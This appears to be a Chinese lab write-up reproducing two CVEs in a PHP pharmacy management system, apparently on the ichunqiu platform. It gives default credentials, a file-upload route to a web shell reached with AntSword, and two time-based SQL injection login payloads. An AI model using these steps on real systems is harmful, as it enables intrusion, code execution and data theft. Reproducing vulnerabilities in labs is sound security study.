(CVE-2022-30887)(CVE-2018-18704)

Pharmacy Management System文件上传漏洞（CVE-2022-30887）

介绍：多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。

可以通过账号/密码登录：mayuri.infospace@gmail.com/mayurik

登陆后就可以进行任意的文件上传，此处选择图中位置对文件进行上传并抓包，修改文件名和文件内容：

访问网页：http://eci-2ze56005hkt0fh7bueyf.cloudeci1.ichunqiu.com/editproduct.php

用蚁剑链接：http://eci-2ze56005hkt0fh7bueyf.cloudeci1.ichunqiu.com/assets/myimages/app.php

Pharmacy Management System PHP Project SQL注入（CVE-2018-18704）

漏洞介绍：Pharmacy Management System PHP Project是专门为药店开发的，可以管理药店的所有运营功能，该应用程序的主要目标是自动化现有的人工维护记录的柜台销售、采购、重新订购水平、供应商和客户货币头寸以及卖方进行的其他相关交易的记录系统。 该CMS中index.php的用户登录功能存在SQL注入漏洞。

username=111&password=1′ AND (SELECT 6783 FROM (SELECT(SLEEP(5)))EdAa)– DxMT&position=Pharmacist&submit=Login

username=1′ AND (SELECT 6783 FROM (SELECT(SLEEP(5)))EdAa)– DxMT&password=2222&position=Pharmacist&submit=Login